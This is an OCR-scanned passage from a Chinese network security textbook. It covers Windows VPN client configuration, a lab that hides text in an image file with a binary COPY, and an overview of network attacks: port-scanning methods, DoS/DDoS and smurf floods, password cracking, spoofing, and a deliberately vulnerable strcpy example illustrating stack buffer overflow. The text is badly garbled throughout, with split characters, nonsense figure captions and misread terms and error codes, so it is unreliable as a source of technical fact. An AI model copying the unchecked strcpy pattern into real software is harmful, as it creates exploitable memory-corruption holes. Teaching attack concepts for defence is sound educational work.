(7) 在 进入 的 界面 中 色 选 “在 我 的 桌面 上 添加 一 个 到 此 连接 的 快捷 方式 ” 复 选 框 ,然后 
单 击 “ 完 成 ”按钮 ,如 图 4-22 所 示 。 

4) 配置 企业 VPN 连接 

为 了 避免 出 现成 功 连接 VPN 服务 器 后 客户 端 不 能 访问 Internet 的 问题 ,用 户 还 需要 对 
刚刚 创建 的 企业 VPN 连接 做 简单 的 配置 。 
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LIIióE 


vea EG GERE 
VPN 服务 器 的 和 名称 或 地 址 是 什么 ? 


输入 修正 连 授 的 计算 机 的 主机 各 或 Ip 地址 。 
主机 名 或 XP 地 址 (PD, microsoft. con 或 157.54.0.1) QD: 


= 
《上 一 步 @J La: »| 取消 
ofw] 


图 4-20 设置 主机 名 或 者 IP 地 址 


LL 2 


可 用 连接 
您 可 使 此 新 连接 为 任何 用 尸 所 用 或 充 为 您 目 己 所 用 。 
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图 4-21 设置 可 用 连接 


正在 完成 新 建 连接 向 导 


您 已 成 功 完成 外 隘 下 列 连 按 需 要 的 步 村 


microsoft 


此 连接 将 被 存 入 “网 络 连接 ”文件 天 。 


要 提 建 此 连作 并 关闭 向 导 ， 单 击 “ 完 成 ”。 


m) E] 


图 4-22 完成 设置 


CD 在 “网 络 连接 "窗口 中 右 击 “ 企 业 VPN 连接 ?图标 后 选择 属性 命令 ,在 弹出 的 对 话 框 
中 切换 至 网络” 选项 卡 ,选择 “Internet 协议 (TCP/IP)” 项 ,如 图 4-23 所 示 。 
(2) 单 击 “ 属 性 ”按钮 ,在 弹出 的 对 话 框 中 单 击 “ 高 级 "按钮 ,如 图 4-24 所 示 。 


X (TCP/IP) EEE 


图 4-23 “网 络 "选项 卡 图 4-24 单 击 “高 级 "按钮 


(3) 弹出 “高 级 TCP/IP 设置 "对话 框 ,在 “常规 ”选项 卡 中 取消 勾 选 “ 在 远程 网 络 上 使 用 
默认 网 关 ” 复 选 框 , 单 击 “ 确 定 ” 按 钮 ,如 图 4-25 所 示 。 


高 级 TCP/IP 设置 Al 


- 


图 4-25 高 级 TCP/IP 设置 


实践 


此 时 ,客户 端 VPN 连接 配置 完毕 ,用 户 已 经 具备 了 在 VPN 服务 器 和 客户 端 建立 VPN 
连接 的 条 件 。 

(4) 单 击 桌面 上 的 企业 VPN 连接 图 标 , 弹 出 对 话 框 ,输入 用 户 名 和 密码 (被 赋予 权限 的 
用 户 名 和 密码 ), 即 可 实现 连接 ,如 图 4-26 所 示 。 

成 功 建立 VPN 连接 以 后 ,可 以 双击 桌面 右 下 角 的 VPN 连接 图 标 后 在 弹出 的 对 话 框 中 
查看 其 状态 ,如 图 4-27 所 示 。 
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图 4-26 连接 test 图 4-27 查看 状态 


[3:95 4-31 简单 的 信息 隐藏 


【实验 目的 】 

了 解 通过 信息 隐藏 技术 实现 文件 隐藏 的 原理 ,掌握 用 信息 隐藏 技术 实现 数据 隐藏 与 文 
件 隐 藏 的 方法 。 

【实验 步骤 】 

CD 在 C 盘 根 目录 新 建 一 个 存放 待 隐藏 数 据 信 息 的 txt 文本 ,如 图 4-28 所 示 。 


P o123.txt - 记事 本 


XPD RAD dex) SEV WHY 
123456789 E 


图 4-28 建立 文件 
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(2) 把 一 个 图 片 文件 放 在 txt 文本 文件 的 同一 目录 (C 盘 根 目 录 ) 下 。 
(3) 选择 “开始 ”>“ 运 行 "命令 ,在 “运行 ”对话 框 中 输入 cmd 命令 后 按 Enter 键 ,进入 C 
盘 根 目录 。 


(4) 合并 文件 。 
输入 命令 “COPY 456. jpg /b 十 123. txt /678.jpg”, 如 图 4-29 所 示 。 


INDOWS\systen32\cad. eze z 
Windows XP 
有 1985-200 


nents and Settings Midministratordcd\ 


PY 456.jpg Zb + 123.txt 678.jpg 


图 4-29 合并 文件 
[i88] copy 命令 的 用 法 


COPY [/D] [/V] [/N] [/Y | / - Y] [/Z] [/A | /B ] source [/A | /B][ + source [/A | /B] [+ ...]] 
[destination [/A | /B]] 

* source: 指定 要 复制 的 文件 

。 /A: 表示 一 个 ASCI 文本 文件 

* /B: 表示 一 个 二 进位 文件 。 

* /Di 允许 解密 要 创建 的 目标 文件 

。 destination: 为 新 文件 指定 目录 和 /或 文件 名 


。/V: 验证 新 文件 写 人 是 否 正确 

。/N: 复制 带 有 非 8dot3 名 称 的 文件 时 , 尽 可 能 使 用 短文 件 名 
° /Y: 不 使 用 确认 是 否 要 改写 现 有 目标 文件 的 提示 。 

: 使 用 确认 是 否 要 改写 现 有 目标 文件 的 提示 


EX NER 动 模式 复制 已 联网 的 文件 
(5) 检测 图 片 密码 文件 ,如 图 4-30 所 示 
【提示 】 在 文件 尾部 隐藏 了 文本 数据 的 图 片 文件 ,设置 为 自动 换行 后 , 即 可 在 文本 的 最 


后 找到 对 应 的 数据 信息 。 如 果 使 用 其 他 软件 进行 编辑 并 保存 ,隐藏 的 文本 数据 有 可 能 会 
=. 
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图 4-30 检测 文件 


did 


网 络 攻击 


5.1 网 络 攻击 技术 


任何 以 干扰 、 破 坏 网 络 系统 为 目的 的 非 授权 行为 都 可 以 称 为 网 络 攻 
击 。 攻 击 被 分 为 两 类 ,为 主动 攻击 与 被 动 攻击 。 

主动 攻击 包括 攻击 者 访问 他 所 需 信 息 的 故意 行为 ,比如 伪造 无 效 IP 
地 址 去 连接 服务 器 ,使 接收 到 错误 TP 地 址 的 系统 浪费 资源 。 攻 击 者 是 
在 主动 地 做 一 些 不 利于 目标 系统 的 事情 。 要 寻找 主动 攻击 者 一 般 情况 
下 比较 容易 ,但 是 受 限于 Internet 松散 的 组 织 结构 ,各 个 国家 对 于 跨 境 淹 
源 几 乎 无 能 为 力 , 或 者 说 能 做 的 很 有 限 。 这 就 直接 导致 了 目前 的 一 个 特 
征 就 是 很 多 主动 攻击 表现 为 通过 控制 境外 服务 器 和 主机 发 起 针对 境内 
外 服务 器 的 攻击 。 主 动 攻击 包括 拒绝 服务 攻击 、 信 息 筑 改 ,资源 使 用 其 
骗 等 攻击 方法 。 

被 动 攻击 主要 是 收集 信息 ,而 不 是 进行 访问 或 者 截获 ,所 以 数据 的 
合法 用 户 对 这 种 活动 很 难 觉察 到 。 被 动 攻击 包括 嗅 探 \ 信 息 收 集 等 攻击 
方法 。 


5.1.1 网 络 攻击 的 手段 


通常 的 网 络 攻击 一 般 是 侵入 或 破坏 网 上 的 服务 器 (主机 ), 盗 取 服 务 
器 的 敏感 数据 ,或 干扰 破坏 服务 器 对 外 提供 的 服务 ;也 有 直接 破坏 网 络 
设备 的 网 络 攻击 ,这 种 破坏 影响 较 大 ,会 导致 网 络 服务 异常 ,甚至 中 断 。 
网 络 攻击 手段 可 分 为 以 下 几 种 。 


1. 信息 收集 型 攻击 


网 络 攻击 者 经 常 在 正式 攻击 前 进行 试探 性 的 攻击 ,目标 是 获得 系统 
的 有 用 信息 。 一 般 有 两 种 方式 ,扫描 技术 和 利用 信息 服务 。 扫 描 器 是 一 
种 自动 检测 远程 或 本 地 主机 安全 弱点 的 程序 ,通过 使 用 扫描 器 ,可 不 留 
痕迹 地 发 现 远程 服务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 ,这 就 能 
间接 或 直观 地 了 解 远 程 主机 所 存在 的 安全 问题 。 扫 描 器 并 不 是 一 个 直 
接 的 实施 网 络 攻击 的 工具 ,而 是 一 个 帮助 发 现 目标 机 安全 漏洞 的 工具 。 
扫描 器 通过 选用 远程 TCP/IP 不 同 的 端口 的 服务 ,并 记录 目标 给 予 的 回 
答 ,进而 搜集 到 很 多 关于 目标 主机 的 各 种 信息 ,如 图 5-1 所 示 。 
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图 5-1 端口 扫描 类 型 图 


扫描 器 有 3 项 功能 ,一 是 发 现 一 个 主机 或 网 络 的 功能 ; 二 是 发 现 什么 服务 正在 运行 的 
功能 ; 三 是 通过 测试 服务 发 现 漏洞 的 功能 。 对 于 系统 管理 员 而 言 ,端口 扫描 是 获得 主机 信 
息 的 一 种 常用 方法 。 一 个 端口 就 是 一 个 潜在 的 通信 通道 ,也 就 是 一 个 入侵 通道 。 端 口 扫描 
技术 有 助 于 及 时 发 现 系统 存在 的 安全 弱点 和 漏洞 ,有 助 于 进一步 加 强 系统 的 安全 性 。 

对 于 攻击 者 来 说 ,端口 扫描 技术 是 用 来 寻找 攻击 线索 和 攻击 入 口 的 一 种 有 效 的 方法 。 
通过 端口 扫描 可 以 搜集 到 目标 主机 的 系统 服务 端口 开放 情况 。 

(1) TCP connect() 扫 描 。TCP connect() 是 最 基本 的 一 种 扫描 方式 ,使 用 系统 提供 的 
connect() 系 统 调 用 ,建立 与 目标 主机 端口 的 连接 。 如 果 端 口 正在 监听 ,connect() 就 成 功 返 
回 ; 否则 说 明 端 口 不 可 访问 。 这 种 技术 的 优势 就 是 用 户 使 用 TCP connect() 不 需要 任何 特 
权 , 系 统 中 的 任何 用 户 都 可 以 使 用 这 个 系统 调用 ; 另外 ,用 户 可 以 通过 同时 打开 多 个 套 接 字 
(socket) 来 加 速 扫描 。 

(2) TCP SYN 扫描 。TCP SYN 扫描 常 称 为 半 连 接 扫描 ,因为 并 不 是 一 个 全 TCP E 
接 。 所 谓 半 连接 扫描 ,是 指 扫 描 的 主机 和 目标 主机 的 指定 端口 建立 连接 只 完成 前 两 次 * 握 
手 ”, 第 三 次 “握手 ” 因 被 扫描 主机 中 断 而 没有 建立 起 来 。 扫 描 程 序 发 送 一 个 SYN 数据 包 ， 
就 好 像 准 备 打 开 一 个 真正 的 连接 ,然后 等 待 响应 。 一 个 SYN/ACK 表明 该 端口 正在 被 监 
听 , 一 个 RST 响应 表明 该 端口 没有 被 监听 。 如 果 收 到 一 个 SYN/ACK, 则 通过 立即 发 送 一 
个 RST 来 关闭 连接 。 这 样 做 的 好 处 是 极 少 有 主机 来 记录 这 种 连接 请 求 , 不 利之 处 是 必须 有 
超级 用 户 权限 才能 建立 这 种 可 配置 的 SYN 数据 包 。 

(3) TCP FIN 扫描 。 在 很 多 情况 下 ,即使 是 SYN 扫描 也 不 能 做 到 很 隐秘 。 一 些 防火 
墙 和 包 过 滤 程 序 可 以 监视 SYN 数据 包 访问 一 个 未 被 允许 访问 的 端口 ,一些 程序 可 以 检测 
到 这 些 扫描 。FIN 数据 包 却 有 可 能 通过 这 些 扫描 。 其 基本 思想 是 关闭 的 端口 将 会 用 正确 的 
RST 来 应 答 发 送 的 FIN 数据 包 ; 而 相反 ,打开 的 端口 往往 忽略 这 些 请 求 。 这 是 一 个 TCP 
实现 上 的 错误 ,但 也 不 是 所 有 系统 都 存在 这 类 错误 。 


(4) Fragmentation 扫描 。Fragmentation 扫描 并 不 是 仅仅 发 送 探测 的 数据 包 , 而 是 将 
要 发 送 的 数据 包 分 成 一 组 更 小 的 IP 包 。 通 过 将 TCP 包头 分 成 几 段 , 放 入 不 同 的 IP 包 中 ， 
使 得 包 过 滤 程 序 难以 过 滤 ,进而 进行 想 进行 的 扫描 活动 。 必 须 注意 的 是 ,一 些 程序 很 难处 理 
这 些 过 小 的 包 。 

(5) UDP recfrom() 和 write() 扫 描 。 一 些 人 认为 UDP 扫描 是 无 意义 的 ,认为 没有 root 
权限 的 用 户 不 能 直接 得 到 端口 不 可 访问 的 错误 ,但 是 Linux 可 以 间接 地 通知 用 户 。 例 如 ,一 
个 关闭 的 端口 的 第 二 次 write() 调 用 通常 会 失败 。 如 果 在 一 个 非 阻 塞 的 UDPsocket 上 调用 
recfrom O ,通常 会 返回 EAGAIN O C" Try again". errno — 13). m ICMP 则 会 收 到 一 个 
ECONNERFUSED ("Connection refused" .errno—111) 错误 信息 。 

(6) ICMP echo 扫描 。ICMP 扫描 并 不 是 一 个 真正 的 端口 扫描 ,因为 ICMP 并 没 得 到 
端口 的 信息 。 用 ping 这 个 命令 ,通常 可 以 得 到 网 上 的 目标 主机 是 否 正 在 运行 的 信息 。 

(7) TCP 反 向 Ident 扫描 。Ident 协议 允许 (rfc1413) 看 到 通过 TCP 连接 的 任何 进程 的 
拥有 者 的 用 户 名 ,即使 这 个 连接 不 是 由 这 个 进程 开始 的 。 举 个 例子 ,连接 到 HTTP 端口 , 然 
后 用 Ident 协议 发 现 服务 器 是 否 正在 以 root 权限 运行 。 这 种 方法 只 能 在 和 目标 端口 建立 了 
一 个 完整 的 TCP 连接 后 才能 看 到 。 

(8) FTP 返回 攻击 。FTP 协议 支持 代理 连接 , 即 攻击 者 可 以 从 自己 的 计算 机 和 目标 主 
机 建立 一 个 基于 协议 解释 器 的 通信 连接 ,然后 请 求 激活 一 个 有 效 的 数据 传输 进程 来 向 
Internet. 上 任何 地 方 发 送 文件 。 

(9) UDP ICMP 端口 不 能 到 达 扫 描 。 这 种 方法 与 上 面 儿 种 方法 的 不 同 之 处 在 于 ,其 使 
用 的 是 UDP 协议 。 由 于 这 个 协议 很 简单 ,所 以 扫描 变 得 相对 比较 困难 。 这 是 由 于 打开 的 
端口 对 扫描 探测 并 不 发 送 一 个 确认 ,关闭 的 端口 也 并 不 需要 发 送 一 个 错误 数据 包 。 


2. 拒绝 服务 攻击 


拒绝 服务 (Denial of Service,DoS) 就 是 用 超出 被 攻击 目标 处 理 能 力 的 数据 包 消 耗 可 用 
系统 、 宽 带 资源 ,致使 网 络 服 务 瘫痪 的 一 种 攻击 手段 。 攻 击 者 首先 通过 比较 常规 的 黑客 手段 
侵入 并 控制 某 台 主机 ,之 后 在 该 主机 上 安装 并 启动 一 个 可 由 攻击 者 发 出 的 特殊 指令 来 进行 
控制 的 进程 一 一 木马 。 当 攻击 者 把 攻击 对 象 的 IP 地 址 作为 指令 下 达 给 这 些 进程 时 ,这 些 进 
程 就 开始 对 目标 主机 发 起 攻击 。 

(1) 分 布 式 拒绝 服务 攻击 (Distributed Denial of Service, DDoS) 攻 击 是 在 传统 DoS 攻 
击 的 基础 之 上 产生 的 一 类 攻击 方式 。 单 一 的 DoS 攻击 一 般 采 用 一 对 一 方式 , 当 攻 击 目标 
CPU 速度 低 .内 存 小 或 者 网 络 带宽 小 等 各 项 性 能 指标 不 高 时 , 它 的 效果 是 明显 的 。 随 着 计 
算 机 与 网 络 技术 的 发 展 , 计 算 机 的 处 理 能 力 迅 速 增长 ,内存 大 大 增加 ,同时 也 出 现 了 千 兆 级 
别 的 网 络 ,这 使 得 DoS 攻击 的 困难 程度 加 大 了 。 所 以 分 布 式 拒绝 服务 攻击 手段 应 运 而 生 。 
如 果 用 一 台 攻 击 机 来 攻击 不 再 能 起 作用 ,攻击 者 就 使 用 成 百 上 千 甚 至 上 万 台 来 自 全 球 不 同 
地 理 位 置 的 主机 同时 进行 攻击 ,往往 防不胜防 。 

中 国 国家 计算 机 网 络 应 急 技术 处 理 协调 中 心 (CNCERT)2011 年 中 国 互联 网 网 络 安全 
态势 报告 显示 ,分 布 式 拒 绝 服 务 攻击 是 运营 商 、 服 务 提供 商 以 及 密切 依赖 网 络 的 企业 最 大 的 
威胁 。2011 年 每 天 发 生 的 分 布 式 拒 绝 服 务 攻击 事件 中 平均 约 有 7% 的 事件 涉及 基础 电信 运 
营 企 业 的 域名 系统 或 服务 。2011 4E 7 H 15 日 域名 注册 服务 机 构 三 五 互联 DNS 服务 器 章 
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受 DDoS 攻击 ,导致 其 负责 解析 的 大 运 会 官网 域名 在 部 分 地 区 无 法 解析 。 

(2) TCP SYN 拒绝 服务 攻击 : 目标 计算 机 如 果 接 收 到 大 量 的 TCP SYN 报 文 , 而 没有 
收 到 发 起 者 的 第 三 次 ACK 回应 ,会 一 直 等 待 ,处 于 这 样 乾 傣 状态 的 半 连 接 如 果 很 多 , 则 会 
把 目标 计算 机 的 资源 (TCB 控制 结构 ,TCB 一 般 情况 下 是 有 限 的 ) 耗 尽 ,而 不 能 响应 正常 的 
TCP 连接 请 求 。 分 布 式 反射 拒绝 服务 攻击 (Distributed Reflection Denial of Servie Attack， 
DRDoS) 是 新 一 代 的 DDOS 攻击 。 它 不 需要 收集 大 量 倪 偶 主机 ,只 要 带宽 足够 ,一 台 机 器 
就 可 以 发 动 一 次 大 规模 的 攻击 ,大 型 门户 网 站 也 可 以 在 短 时 间 内 停止 服务 。 例 如 攻击 者 A 
利用 带 有 请 求 的 SYN 数据 包 对 网 络 路 由 器 B 进行 洪水 攻击 ,这 些 数据 包 带 有 虚假 的 源 TP 
地 址 ,这 些 地 址 都 是 某 网 站 C 的 IP 地址 。 这 样 ,路 由 器 B 以 为 这 些 SYN 数据 包 是 从 C 网 
站 发 送 过 来 的 , 便 向 C 网 站 发 送 SYN/ACK 数据 包 作 为 三 次 握手 过 程 的 第 二 步 一 一 根据 请 
求 的 该 网 站 TP 地 址 返回 SYN/ ACK 包 ,恶意 的 数据 包 就 反射 到 该 网 站 的 主机 上 ,形成 洪水 
攻击 ,造成 网 站 C 带宽 资源 的 耗 尽 ,最 终 导致 拒绝 服务 。 

(3) ICMP 洪水 : 攻击 者 向 目标 计算 机 发 送 大 量 的 ICMP ECHO 报 文 (产生 ICMP jit 
水 ) ,目标 计算 机 会 忙于 处 理 这 些 ECHO 报 文 , 而 无 法 继续 处 理 其 他 网 络 数据 报 文 。 

(4) UDP 洪水 : 攻击 者 通过 发 送 大 量 的 UDP 报 文 给 目标 计算 机 ,导致 目标 计算 机 忙于 
处 理 这 些 UDP 报 文 而 无 法 继续 处 理 正常 的 报 文 。 

(5) 分 片 IP 报 文 攻击 : 攻击 者 给 目标 计算 机 只 发 送 一 片 分 片 报 文 ,而 不 发 送 所 有 分 片 
报 文 ,这 样 攻击 者 计算 机 便 会 一 直 等 待 , 直 到 一 个 内 部 计时 器 到 时 。 如 果 攻 击 者 如 此 发 送 大 
量 的 分 片 报 文 , 就 会 消耗 掉 目 标 计算 机 的 资源 ,而 导致 不 能 响应 正常 的 TP 报 文 。 

(6) smurf 攻击 。ICMP ECHO 请 求 包 用 来 对 网 络 进行 诊断 , 当 一 台 计算 机 接收 到 这 样 
一 个 报 文 后 ,会 向 报 文 的 源 地 址 回应 一 个 ICMP ECHO REPLY。 一 般 情况 下 ,计算 机 是 不 
检查 该 ECHO 请 求 的 源 地 址 的 ,因此 ,如 果 一 个 恶意 的 攻击 者 把 ECHO 的 源 地 址 设置 为 一 
个 广播 地 址 ,计算 机 在 回复 REPLY 的 时 候 ,就 会 以 广播 地 址 为 目的 地 址 ,这 样本 地 网 络 上 
的 所 有 计算 机 都 必须 处 理 这 些 广 播报 文 。 如 果 攻 击 者 发 送 的 ECHO 请 求 报 文 足够 多 ,产生 
的 REPLY 广播 报 文 就 可 能 把 整个 网 络 沽 没 。 这 就 是 所 谓 的 smurf 攻击 。 

(7) CC 攻击 (Challenge Collapsar) 是 DDoS 的 一 种 ,是 更 具有 技术 含量 的 一 种 攻击 方 
式 。CC 攻击 利用 代理 服务 器 向 网 站 发 送 大 量 需 要 较 长 计算 时 间 的 URL 请 求 , 如 数据 库 查 
询 等 ,导致 服务 器 进行 大 量 计算 而 很 快 达到 自身 的 处 理 能 力 形成 DOS, 攻 击 者 一 旦 发 送 请 
求 给 代理 就 主动 断 开 连接 ,因为 代理 并 不 因为 客户 端 这 边 连接 的 断 开 就 不 去 连接 目标 服务 
器 ,因此 攻击 机 的 资源 消耗 相对 很 小 ,而 从 目标 服务 器 看 来 ,来 自 代 理 的 请 求 都 是 合法 的 。 
可 见 ,CC 攻击 完全 模拟 正常 访问 行为 ,没有 虚假 IP, 也 没有 大 的 流量 异常 ,但 一 样 会 造成 服 
务 器 无 法 正常 连接 ,一 个 普通 用 户 发 起 的 CC 攻击 就 可 以 瘫痪 一 台 高 性 能 的 服务 器 。 


3. 利用 型 攻击 


一 种 利用 型 攻击 为 : 口令 猜测 , 即 通过 猜测 密码 进入 系统 ,获得 对 系统 资源 的 访问 权 
限 。 攻 击 者 攻击 目标 时 常常 把 破译 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜 到 或 者 确 
定 用 户 的 口令 ,他 就 能 获得 机 器 或 者 网 络 的 访问 权 , 并 能 访问 到 用 户 能 访问 到 的 任何 资源 。 
如 果 这 个 用 户 有 域 管理 员 或 root 用 户 权限 ,这 会 是 极其 危险 的 。 获 取 口 令 的 方法 主要 有 如 
FJL. 


第 一 种 方法 是 通过 网 络 监听 非法 得 到 用 户口 令 , 这 类 方法 有 一 定 的 局 限 性 ,但 危害 性 极 
大 。 监 听 者 往往 采用 中 途 截击 的 方法 ,也 是 获取 用 户 账户 和 密码 的 一 条 有 效 途径 。 当 前 ,很 
多 协议 根本 就 没有 采用 任何 加 密 或 身份 认证 技术 ,如 在 Telnet.FTP.HTTP.SMTP 等 传输 
协议 中 ,用 户 账户 和 密码 信息 都 是 以 明文 格式 传输 的 ,此 时 车 攻击 者 利用 数据 包 截 取 工 具 ， 
便 可 很 容易 收集 到 用 户 的 账户 和 密码 。 还 有 一 种 中 途 截击 攻击 方法 ,就 是 它 在 同 服 务 器 端 
完成 “三 次 握手 ”建立 连接 之 后 ,在 通信 过 程 中 扮演 * 第 三 者 ”的 角色 ,假冒 服务 器 身份 欺骗 ， 
再 假冒 向 服务 器 发 出 恶意 请 求 , 其 造成 的 后 果 不 堪 设想 。 另 外 ,攻击 者 有 时 还 会 利用 软件 和 
硬件 工具 时 刻 监 视 系 统 主机 的 工作 ,等 待 记录 用 户 登录 信息 ,从 而 取得 用 户 密码 ; 或 者 编制 
有 缓冲 区 溢出 错误 的 SUID 程序 来 获得 超级 用 户 权限 。 

第 二 种 方法 为 在 知道 用 户 的 账号 后 利用 一 些 专门 软件 强行 破解 用 户口 令 , 这 种 方法 不 
受 网 段 限 制 , 但 攻击 者 要 有 足够 的 耐心 和 时 间 。 如 采用 字典 穷 举 法 (或 称 暴力 法 ) 来 破解 用 
户 的 密码 ,攻击 者 可 以 通过 一 些 工 具 程 序 , 自 动 地 从 电脑 字典 中 取出 一 个 单词 作为 用 户 的 口 
令 输入 远 端 的 主机 申请 进入 系统 , 若 口令 错误 ,就 按 序 取出 下 一 个 单词 ,进行 下 一 个 尝试 ,一 
直 循环 下 去 ,直到 找到 正确 的 口令 或 字典 的 单词 试 完 为 止 。 由 于 这 个 破译 过 程 由 计算 机 程 
序 来 自动 完成 ,因而 几 个 小 时 就 可 以 把 字典 里 记录 的 上 十 万 条 单词 都 尝试 一 遍 。 

第 三 种 方法 为 利用 系统 管理 员 的 失误 。 在 现代 的 UNIX 操作 系统 中 ,用 户 的 基本 信息 
存放 在 passwd 文件 中 ,而 所 有 口令 则 经 过 DES 加 密 方法 加 密 后 专门 存放 在 一 个 叫 shadow 
的 文件 中 。 黑 客 们 获取 口令 文件 后 ,就 会 使 用 专门 破解 DES 加 密 法 的 程序 来 解 口令 。 同 
时 ,由 于 为 数 不 少 的 操作 系统 都 存在 许多 安全 漏洞 ,Bug 或 其 他 一 些 设计 缺陷 ,这 些 缺 陷 一 
且 被 找 出 ,黑客 就 可 以 长 驱 直 入 ,放置 特洛伊 木马 程序 。 

特洛伊 木马 是 在 普通 的 程序 中 嵌入 一 段 隐 藏 的 .激活 后 可 用 于 攻击 的 代码 。 它 可 能 会 
使 大 量 的 数据 遭 到 破坏 ,也 很 可 能 使 宿主 计算 机 成 为 倪 儒 主机 。 相 关内 容 将 在 第 6 章 做 详 
细 介 绍 。 

另 一 种 利用 型 攻击 为 缓冲 区 溢出 攻击 ,其 已 成 为 最 常用 的 黑客 技术 之 一 。 由 于 在 很 多 
服务 程序 中 ,大 意 的 程序 员 会 使 用 类 似 strepy O ,strcat() 的 不 进行 有 效 位 检查 的 函数 ,最 终 
可 能 导致 恶意 用 户 编写 一 小 段 利用 程序 来 进一步 打开 安全 咱 口 ,然后 将 该 代码 级 在 缓冲 区 
有 效 载 荷 末 尾 , 这 样 当 发 生 缓冲 区 溢出 时 ,返回 指针 会 指向 恶意 代码 ,导致 系统 的 控制 权 就 
会 被 夺取 。 

缓冲 区 溢出 是 指 当 计算 机 向 缓冲 区 内 填充 数据 位 数 时 超过 了 缓冲 区 本 身 的 容量 时 , 洲 
出 的 数据 覆盖 在 合法 数据 上 的 行为 ,理想 的 情况 是 程序 检查 数据 长 度 并 不 允许 输入 超过 组 
冲 区 长 度 的 字符 ,但 是 绝 大 多 数 程序 都 会 假设 数据 长 度 总 是 与 所 分 配 的 储存 空间 相 匹 配 ,这 
就 为 缓冲 区 溢出 埋 下 隐患 。 操 作 系 统 所 使 用 的 缓冲 区 又 称 为 堆栈 ,在 各 个 操作 进程 之 间 , 指 
令 会 被 临时 储存 在 堆栈 当中 ,堆栈 也 会 出 现 缓冲 区 溢出 。 

缓冲 区 溢出 漏洞 攻击 是 以 更 改 目 标 程序 的 运行 流程 ,使 得 攻击 者 可 以 获得 程序 控制 权 
为 目的 地 攻击 。 要 想 使 攻击 者 实现 攻击 ,有 两 个 必须 条 件 , 第 一 是 可 以 被 攻击 的 数据 结构 ; 
第 二 是 可 以 被 执行 的 攻击 代码 。 攻 击 代码 可 以 是 程序 或 系统 中 已 有 的 函数 ,也 可 以 是 由 攻 
击 者 注入 的 可 执行 代码 。 

到 目前 为 止 , 缓 冲 区 溢出 攻击 可 以 分 为 四 种 类 型 ,分别 为 堆栈 洪 出 ` 植 和 法、 指针 托 词 
(指针 改写 ) 和 静态 存储 区 溢出 。 在 这 4 种 类 型 中 ,堆栈 溢出 是 出 现 最 早 、 存 在 最 广泛 、 利 用 
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最 简单 的 攻击 方式 。 堆 栈 溢出 攻击 的 基本 思路 就 是 更 改 运 行 时 的 流程 去 执行 攻击 者 注入 的 
代码 。 在 绝 大 多 数 C 语言 编译 器 中 ,函数 返回 地 址 都 存在 同一 个 堆栈 段 中 ,因此 使 产生 了 
这 样 的 攻击 方式 。 如 下 是 一 个 常见 的 堆栈 溢出 攻击 示 ' sasaqa 
例 代码 ,参见 图 示 5-2, s 


argv[] 
copy(char * str) return address 


t fp = saved fp 
char buf[64]; buffer[63] 
strcpy(buf, str); 1 


上 
) . Attack code. 
void main(int argc, char * argv[]) buffer[O ] 
u p= s s —l 


t 


if(argc > 1) I Memory growth 
copy(argv[1]); 


) 图 5-2 程序 用 户 栈 

图 5-2 显示 了 一 个 典型 的 函数 被 调用 后 的 用 户 栈 结构 。 函 数 copy() 利 用 库 函 数 strcpy() 
将 str 中 的 内 容 直 接 复制 到 buffer 中 ,这 样 只 要 str 的 长 度 大 于 64, 就 会 造成 buffer W tii 
出 ,使 程序 运行 出 错 。 存 在 类 似 问题 的 标准 函数 还 有 strcat()、sprintf()、vsprintf()、gets()、 
scanf() 等 。 

缓冲 区 中 填充 任意 数据 造成 溢出 一 般 只 会 出 现 * 分 段 错 误 ”(Segmentation fault) ,而 不 
能 达到 攻击 的 目的 。 最 常见 的 手段 是 通过 制造 缓冲 区 溢出 使 程序 运行 一 个 用 户 shell ,再 通 
过 shell 执行 其 他 命令 。 如 果 该 程序 属于 root HA suid 权限 ,攻击 者 就 获得 了 一 个 有 root 
权限 的 shell, 可 以 对 系统 进行 任意 操作 。 

缓冲 区 溢出 攻击 之 所 以 成 为 一 种 常见 安全 攻击 手段 ,原因 在 于 缓冲 区 溢出 漏洞 非常 普 
遍 , 并 且 易 于 实现 。 缓冲 区 溢出 之 所 以 成 为 远程 攻击 的 主要 手段 ,原因 在 于 缓冲 区 溢出 漏洞 
给 予 了 攻击 者 植 入 并且 执行 攻击 代码 的 权限 ,可 以 得 到 被 攻击 主机 的 控制 权 。 


4. 欺骗 型 攻击 


欺骗 型 攻击 法 用 于 攻击 目标 配置 不 正确 的 消息 ,主要 包括 IP 欺骗 .电子 邮件 欺骗 \Web 
欺骗 等 。 

IP 欺骗 的 最 基本 形式 是 搞 清 楚 一 个 网 络 的 配置 ,然后 改变 自己 的 IP 地 址 ,伪装 成 别人 
机 器 的 IP 地 址 。 这 样 做 会 使 所 有 发 送 的 数据 包 都 带 有 假冒 的 源 地 址 ,是 低 等 级 的 技术 ， 
为 所 有 应 答 都 回 到 了 被 盗用 了 地 址 的 机 器 上 ,而 不 是 攻击 者 的 机 器 ,所 以 也 被 叫做 盲目 飞行 
攻击 (flying blind attack) ,或 者 叫做 单 向 攻击 (one-way attack)。 这 种 攻击 虽 有 一 些 限制 ， 
但 就 某 一 特定 类 型 的 拒绝 服务 攻击 而 言 , 只 需要 一 个 数据 包 去 撞击 机 器 ,而 且 地 址 欺骗 会 让 
人 们 更 难于 找到 攻击 者 的 根源 。 对 某 些 特定 的 攻击 ,如 果 系 统 收 到 了 意 想不到 的 数据 包 , 说 
明 对 系统 的 攻击 仍然 在 进行 。 而 且 因 为 UDP 是 无 连接 的 ,所 以 单独 的 UDP 数据 包 会 被 发 
送 到 受害 方 的 系统 中 。 

电子 邮件 欺骗 即 电 子 邮 件 的 发 送 方 地 址 的 欺骗 。 攻 击 者 使 用 电子 邮件 欺骗 有 3 + H 
的 ,第 一 ,隐藏 自己 的 身份 ; 第 二 ,攻击 者 A 假冒 B 的 电子 邮件 。 使 用 这 种 方法 ,C 接收 到 这 
封 邮件 ,会 认为 它 是 B 发 的 ; 第 三 ,电子 邮件 欺骗 能 被 看 做 是 社会 工程 的 一 种 表现 形式 。 例 


如 ,如 果 攻 击 者 A Bib C 发 给 他 一 份 敏感 文件 ,A 会 伪装 其 邮件 地 址 使 C 认为 这 是 老板 的 
要 求 , 导 致 C 可 能 会 发 给 他 这 封 邮件 。 

Web 欺骗 包括 以 下 3 种 情况 。 

CD 基本 的 网 站 欺骗 (钓鱼 网 站 )。 攻 击 者 A 会 利用 现在 注册 一 个 域名 没有 任何 要 求 的 
现状 ,抢先 或 特别 设计 注册 一 个 非常 类 似 的 有 欺骗 性 的 站 点 。 当 一 个 用 户 浏览 了 这 个 假冒 
地 址 ,并 与 站 点 作 了 一 些 信息 交流 ,如 填写 了 一 些 表单 后 ,站 点 会 给 出 一 些 相 应 的 提示 和 回 
